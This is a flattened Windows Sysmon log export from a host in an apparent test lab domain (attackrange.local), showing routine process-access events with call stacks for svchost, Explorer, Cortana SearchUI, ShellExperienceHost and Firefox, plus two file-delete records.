07:54:06.649{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001049471Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.633{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049470Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.633{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049469Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.633{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049468Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:06.633{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049467Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.631{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049466Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:06.631{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049465Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:06.631{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049464Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:06.631{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049463Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:06.630{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049462Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:06.629{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049461Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:06.628{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049460Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:06.627{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049459Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:06.611{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049458Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:06.611{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049457Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:06.611{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049456Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.611{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049455Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:06.611{466BC892-32D3-60E8-770B-00000000CF01}63564228C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049454Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.611{466BC892-32D3-60E8-770B-00000000CF01}63564228C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049453Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.331{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18D522C143CF4A549196A522E6A4198B,SHA256=537569BF5A9242A7CADF891314A70472782FDEB13778AE2521BAF33E2B4109CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049452Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.265{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049451Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.233{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5CC7-60E8-0D11-00000000CF01}7760C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla 
Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001049450Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.233{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5CC7-60E8-0D11-00000000CF01}7760C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla 